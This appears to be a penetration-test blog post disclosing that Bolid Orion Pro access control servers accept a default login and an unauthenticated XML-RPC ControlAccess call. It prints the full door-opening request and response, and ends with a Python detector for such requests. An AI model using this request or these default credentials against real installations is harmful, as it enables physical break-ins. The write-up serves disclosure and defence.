Once, while pentesting a Wi-Fi network, I discovered a lot of open ports (XML-RPC) on one of the hosts.

The server kindly answered the garbage I had sent:

BolidXMLRPC/1.10 (Windows NT) ORION-BOLID v1.10

A bit of googling and I found out that this was the access control system АРМ «Орион Про» of the security company ЗАО НВП «Болид».

After reading the documentation I tried ADMINISTRATOR:ORION as the credentials. That was successful: I could manage the system however I wanted. But this story is not about that.

What if there was a strong password?

In that case you could still use the XML-RPC methods that do not require authentication. There are plenty of them, e.g. GetPasswordListWithStatus, GetKeyFullInformation, GetDeviceListAsync and ControlAccess.

If you wanted to, you could open the door controlled by that “security system” with the following request:

GET / HTTP/1.1
Host: x.x.x.x:8080
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: ru,ru-RU;q=0.9,en;q=0.8,en-US;q=0.7
Connection: close
Content-Type: application/xml
Content-Length: 1467

<?xml version="1.0" encoding="windows-1251"?>
<methodCall>
  <methodName>ControlAccess</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>ComPort</name>
            <value>
              <int>3</int>
            </value>
          </member>
          <member>
            <name>PKUAddress</name>
            <value>
              <int>0</int>
            </value>
          </member>
          <member>
            <name>DeviceAddress</name>
            <value>
              <int>5</int>
            </value>
          </member>
          <member>
            <name>AggregateAddress</name>
            <value>
              <int>1</int>
            </value>
          </member>
          <member>
            <name>Command</name>
            <value>
              <int>7</int>
            </value>
          </member>
          <member>
            <name>MethodNameForAnswer</name>
            <value>
              <string>Result</string>
            </value>
          </member>
          <member>
            <name>IPSERVER</name>
            <value>
              <string>y.y.y.y</string>
            </value>
          </member>
          <member>
            <name>PORTSERVER</name>
            <value>
              <int>7777</int>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Voila!

HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Length: 298
Content-Type: text/xml
Content-MD5: 5si9s8913Zio3EUFMy7mww==
Server:  BolidXMLRPC/1.10 (Windows NT) ORION-BOLID v1.10

<?xml version="1.0" encoding="Windows-1251" ?>
<methodResponse>
   <params>
   <param>
<value>
  <struct>
    <member>
      <name>Result</name>
      <value><boolean>1</boolean></value>
    </member>
  </struct>
</value>
   </param>
   </params>
</methodResponse>
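As an added example (not code from the original post or from the vendor), here is a small Python checker a defender could run over captured HTTP bodies from this XML-RPC endpoint, for instance bodies pulled from a proxy log or a pcap. It parses the methodCall, flags the methods the post names as callable without credentials, extracts the device/command target of a ControlAccess call together with the IPSERVER/PORTSERVER address the server is told to deliver its answer to, and parses the methodResponse to confirm whether the command was accepted. The method names and struct fields come from the post; the severity levels and the allow-list of callback hosts are my assumptions.

```python
from __future__ import annotations
import xml.etree.ElementTree as ET
from typing import Any

# Methods the write-up reports as callable on this server without authentication.
SENSITIVE_METHODS = {
    "ControlAccess": "door/relay control",
    "GetPasswordListWithStatus": "credential disclosure",
    "GetKeyFullInformation": "credential disclosure",
    "GetDeviceListAsync": "device enumeration",
}

def _value(node: ET.Element) -> Any:
    """Convert an XML-RPC <value> node into a Python value (the subset this server uses)."""
    if len(node) == 0:                      # untyped <value>text</value> is a string
        return (node.text or "").strip()
    child = node[0]
    if child.tag in ("int", "i4"):
        return int(child.text)
    if child.tag == "boolean":
        return (child.text or "").strip() == "1"
    if child.tag == "string":
        return child.text or ""
    if child.tag == "struct":
        return {m.findtext("name"): _value(m.find("value")) for m in child.findall("member")}
    if child.tag == "array":
        return [_value(v) for v in child.findall("data/value")]
    return child.text                       # double, dateTime, base64: left as raw text

def _parse(body: bytes | str, expected_root: str) -> ET.Element:
    # The Orion server declares windows-1251; decode with it so Cyrillic names survive.
    if isinstance(body, bytes):
        body = body.decode("windows-1251", errors="replace")
    root = ET.fromstring(body)
    if root.tag != expected_root:
        raise ValueError(f"expected <{expected_root}>, got <{root.tag}>")
    return root

def parse_call(body: bytes | str) -> tuple[str, list]:
    """Return (methodName, [params]) from an XML-RPC methodCall body."""
    root = _parse(body, "methodCall")
    name = (root.findtext("methodName") or "").strip()
    return name, [_value(p.find("value")) for p in root.findall("params/param")]

def parse_response(body: bytes | str) -> Any:
    """Return the single value carried by an XML-RPC methodResponse."""
    root = _parse(body, "methodResponse")
    return _value(root.find("params/param/value"))

def assess(body: bytes | str, allowed_callbacks: frozenset[str] = frozenset()) -> dict:
    """Triage one captured request: which method, how serious, and where its answer goes."""
    method, params = parse_call(body)
    args = params[0] if params and isinstance(params[0], dict) else {}
    finding: dict = {"method": method, "reasons": []}
    if method in SENSITIVE_METHODS:
        finding["reasons"].append(f"method usable without credentials ({SENSITIVE_METHODS[method]})")
    if method == "ControlAccess":
        keys = ("ComPort", "PKUAddress", "DeviceAddress", "AggregateAddress", "Command")
        finding["target"] = {k: args.get(k) for k in keys}
    # The server posts its answer to whatever IPSERVER:PORTSERVER the caller supplies; a host
    # that is not the operator console is a strong sign the request did not come from it.
    if "IPSERVER" in args:
        finding["callback"] = f"{args['IPSERVER']}:{args.get('PORTSERVER')}"
        if args["IPSERVER"] not in allowed_callbacks:    # allow-list is an assumption
            finding["reasons"].append("answer callback directed to a non-allowlisted host")
    finding["severity"] = ("high" if method == "ControlAccess"
                           else "medium" if method in SENSITIVE_METHODS else "info")
    return finding

def _member(name: str, typ: str, val: Any) -> str:
    return f"<member><name>{name}</name><value><{typ}>{val}</{typ}></value></member>"

# Constructed samples mirroring the request and response shown in the post.
SAMPLE_CALL = (
    '<?xml version="1.0" encoding="windows-1251"?>'
    "<methodCall><methodName>ControlAccess</methodName><params><param><value><struct>"
    + "".join(_member(n, t, v) for n, t, v in [
        ("ComPort", "int", 3), ("PKUAddress", "int", 0), ("DeviceAddress", "int", 5),
        ("AggregateAddress", "int", 1), ("Command", "int", 7),
        ("MethodNameForAnswer", "string", "Result"),
        ("IPSERVER", "string", "y.y.y.y"), ("PORTSERVER", "int", 7777)])
    + "</struct></value></param></params></methodCall>"
).encode("windows-1251")

SAMPLE_RESPONSE = (
    '<?xml version="1.0" encoding="Windows-1251" ?><methodResponse><params><param><value>'
    "<struct><member><name>Result</name><value><boolean>1</boolean></value></member></struct>"
    "</value></param></params></methodResponse>"
)

if __name__ == "__main__":
    print(assess(SAMPLE_CALL))
    print("server accepted the command:", parse_response(SAMPLE_RESPONSE))
```

Run against the post's request, the checker reports a high-severity ControlAccess finding targeting device 5 on COM port 3 with command 7, and an answer callback to y.y.y.y:7777; the paired response parses to {"Result": True}, which is the evidence an incident responder needs that the command was actually executed. In practice the alert rule is simple: any request to this listener whose method is in the sensitive set, or whose IPSERVER is not the operator console, should page someone, because the server itself will not refuse it.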

The company that makes these access control systems does not seem to be bothered about access control whatsoever.